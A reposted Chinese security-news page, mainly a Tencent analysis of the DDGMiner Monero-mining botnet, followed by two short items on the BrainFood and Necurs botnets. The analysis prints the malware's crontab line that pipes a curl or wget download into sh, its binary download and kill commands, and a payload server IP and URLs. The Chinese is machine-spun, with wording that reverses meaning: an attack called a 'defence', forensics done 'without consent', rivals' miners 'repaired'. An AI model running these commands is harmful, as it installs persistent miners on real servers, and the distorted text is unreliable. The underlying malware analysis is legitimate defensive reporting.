僵尸网络|HackerNews

感谢腾讯御见威胁情报中心来稿！原文：一、背景腾讯安全人士在为某企业用户进行例行安全巡检过程中，发现用户部署的腾讯御界高级威胁评估系统发生了SSH服务失陷感知信息。在未经用户同意后对顾客机器进行远程取证，并结合御界的关键日志进行探讨，我们看到这是一起对于SSH服务器弱口令爆破防御事件。由于看到及时，工程师立即协助用户进行防护及杀毒，并未引起损失。腾讯安全御见威胁情报中心对本次攻击事故展开调查，结果看到，这是由大型挖矿僵尸网络DDGMiner发起的伤害事件。DDGMiner是最早于2017年被看到的挖矿僵尸网络，其特征为扫描攻击SSH服务、Redis和OrientDB等服务器，并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中lastmodified字段可以发现，本次攻击中样本的升级时间为2019-08-29，目前为4004版本。对样本进行预测后，发现与此前版本不同的是，样本中新增了对于NexusRepositoryManager漏洞、Supervisord漏洞的借助攻击代码，其攻击流程大概如下：根据腾讯云鼎实验室检测数据，云上主机遭到来自最新版本DDGMiner的攻击流量从2019.08.29开始发生，在8月30日到达峰值，8月31日到9月1日减弱到一定范围以后渐趋平稳，大个别攻击流量被有效拦截。

而在少量失陷主机中，90%以上遭到SSH弱口令爆破入侵，由此可见DDGMiner的主要传播途径依然为SSH爆破。腾讯安全提示企业客户必须使用高效率的SSH、Redis登录密码，避免因更改不当而遭到伤害导致不必要的代价。二、详细探讨黑客在借助弱口令爆破或漏洞攻击侵入后首先下载Shell脚本i.sh，并将其安装为crontab定时任务每15分钟执行一次。mkdir-p/var/spool/cron/crontabsecho"">/var/spool/cron/rootecho"*/15****(/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl-fsSL-m180||wget-q-T180-O-)|sh">>/var/spool/cron/rootcp-f/var/spool/cron/root/var/spool/cron/crontabs/root之后检查能否已经存在进程nfosfa4，若存在则杀死进程并删除对应的文件，然后从服务器下载ddgs.$(uname-m)保存为nfosfa4，其中uname–m用来获得系统类别并映射到文件名。

最后通过chmod+x给nfosfa4赋予可执行权限，从而完成木马的下载升级。psauxf|grep-vgrep|grepnfosfa4||rm-rfnfosfa4if[!-f"nfosfa4"];thencurl-fsSL-m1800$(uname-m)-onfosfa4||wget-q-T1800$(uname-m)-Onfosfa4fichmod+xnfosfa4接着查找并杀死多个历史版本的病毒进程，进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。psauxf|grep-vgrep|grepnfosbcb|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosbcc|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosbcd|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosbce|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosfa0|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosfa1|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grepnfosfa2|awk'{print$2}'|xargskill-9之后开启病毒的最新版本nfosfa4，病毒被保存于下列四个目录之一。

/usr/bin/nfosfa4/usr/libexec/nfosfa4/usr/local/bin/nfosfa4/tmp/nfosfa4nfosfa4是采用golang语言开发，编译成基于Linux的ELF可执行文件，并且采取UPX加壳保护。golang语言是一款开源编程平台，其特点为简洁可靠，支持夸平台编译等。golang语言比较合适服务器编程、分布式平台和相关的网络编程，而DDGMiner恰好符合这种特性。为了方便探讨，我们借助Linux下的UPX脱壳工具进行脱壳，然后使用IDAGolangHelper脚本在IDA中对变量进行重命名。处理过后可以非常清晰的看见样本中漏洞攻击、挖矿、清除挖矿竞品等功能。在还原后的函数中，可以发现对于SSH爆破、以及针对Redis服务器、Supervisord服务器、NexusRepositoryManager服务器的漏洞利用防御代码。样本还使用了hashicorp的go开源库memberlist来建立分布式网络，memberlist是用来管控分布式集群内节点发现、节点失效侦测、节点列表的开源程序(github:)。样本初次前往受害机时，会获得本地节点的地址和状况信息，然后尝试联结到内置的ip列表中的远端节点能够加入远端的集群。

memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip过程由节点发起，当一个节点有状况应该更新到网络中的其它节点时，它经常随机的选取周围几个节点散播消息，收到消息的节点也会重复该过程，直至最后网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获取升级的挖矿木马和防御脚本同步到所有节点。最后，在挖矿功能部分，通过main_ptr_miner_Download函数下载，main_ptr_miner_Update更新，main_ptr_miner_CheckMd5校验矿机Md5值，以及借助main_ptr_miner_Run启动矿机，并且借助调用main_ptr_miner_killOtherMiner对其它挖矿木马进行修复。三、安全建议1、使用高效率的Redis登陆密码、SSH登录密码,必要时添加防火墙规则导致其它非信任来源ip访问。2、及时恢复Redis、NexusRepositoryManager、Supervisord服务相关的高危漏洞。3、已中毒的linux服务器可搭载以下自动清理方案。a)、crontab如果如果包括下列内容，进行清理："*/15****(/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl-fsSL-m180||wget-q-T180-O-)|sh"b)、/var/spool/cron/root文件，如果包括下列内容，进行清理："*/15****(/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl-fsSL-m180||wget-q-T180-O-)|sh"c)、/var/spool/cron/crontabs/root文件，如果包括下列内容，进行清理："*/15****(/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl-fsSL-m180||wget-q-T180-O-)|sh"d)、删除以下文件/usr/bin/nfosfa4/usr/libexec/nfosfa4/usr/local/bin/nfosfa4/tmp/nfosfa4/usr/bin/betsbcc/usr/libexec/betsbcc/usr/local/bin/betsbcc/tmp/betsbcc/usr/bin/brhjbcc/usr/libexec/brhjbcc/usr/local/bin/brhjbcc/tmp/brhjbcce)删除/tmp目录下文件qW3xT,qW3xT.1,qW3xT.2,qW3xT.3,qW3xT.4,ddgs.3010,ddgs.3011,ddgs.3013,ddgs.3016,2t3ik,2t3ik.m,2t3ik.p,2t3ik.s,imWBR1,imWBR1.ig,wnTKYg,wnTKYg.noaes,fmt.30184、使用腾讯御界高级威胁评估系统测试未知黑客的各类可疑攻击行为。

御界高级威胁评估系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。IOCsIP68.183.140.39URLhxxp://68.183.140.39:8000/static/4004/ddgs.x86_64hxxp://68.183.140.39:8000/static/4004/ddgs.i686hxxp://68.183.140.39:8000/i.shMD5bdfabdfa11c34343bb33ee038800388003880dd718609718609afaf33bb964896489648f7630976309dd5050ad8412954ca87355274bdbd88ffff4ff00efef2626bb713713713dd284692846928469dd080808aa88aa833339833339833339ee7777参考链接：

BrainFood僵尸网络散布恶意PHP脚本，已有超5000个网站受损

作者:榆榆日期:2018-05-23分类:明日推送,恶意软件

据媒体报导，Proofpoint研究员AndrewConway上周对一个名为”BrainFood”的僵尸网络进行了分析。根据Conway的表述，由该僵尸网络实现的垃圾邮件活动早在每年3月就已被看到，其源头可能是来自于一个恶意的PHP脚本，因为该脚本仍然秘密地将客户重定向到减肥和提升智力药片的网站上。据统计，目前已有超过5000个网站上存在该脚本，Conway通过对这种站点进行跟踪后看到，其中绝大多数都是在GoDaddy的网络上找到的，并且仅在上周内活跃的网站已达到2400个。Conway表示，该脚本用于让被黑网站进入网络分子的控制之下，并对各类垃圾邮件活动的动态重定向进行管控。根据近期的垃圾邮件活动看到，该PHP脚本无法从BrainFood运营商那里获取新的“重定向目标”，并收集到每天活动的点击统计数据。虽然僵尸网络也是推送了一些垃圾内容，对用户并无实际害处，但这对被感染的网站来说是危险的，主要是由于它带有类似后门的用途，允许僵尸网络运营商随时执行它们想要的任何代码。消息来源：BleepingComputer，编译：榆榆，审核：吴烦恼;本文由HackerNews.cc编译整理，封面来源于网络；转载请注明“转自HackerNews.cc”并附上原文链接。

垃圾邮件僵尸网路运营商Necurs采用新科技避免测试

作者:榆榆日期:2018-04-29分类:明日推送,恶意软件

外媒近日消息，全球最大的垃圾邮件僵尸网络运营商Necurs目前正在使用一种新的逃避技术，其借助Internet快捷途径或.URL文件来绕过检测。Necurs僵尸网络自2012年以来始终存在，它由全亚洲数百万台被感染的手机组成，目前趋势科技观察到其恶意工具早已受到改进，企图能够顺利地消灭网络安全机制。Necurs新变种试图借助向用户发送一个包括压缩文件的恶意电子邮件来绕开检测。该文件如果被解压缩，就会显示一个扩展名为.url的文件，.url扩展名文件与Windows快捷途径文件相关联，该快捷途径文件会在浏览器中开启一个指向远程脚本文件活动的URL。随后，该脚本会生成了一个名为QuantLoader的下载程序（这是一个普通的恶意工具家族）来下载并执行最后的有效负载。图1.先前版本的恶意工具图图2.演变的Necurs恶意工具图原本，Necurs的JavaScript下载器会下载最终的有效载荷。但在最新版本中，是借助远程脚本生成QUANTLOADER下载程序（由趋势科技评估为TROJ_QUANT），然后下载最终的有效负载，这是添加到Necurs的感染链上的另一层。

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-135291-1.html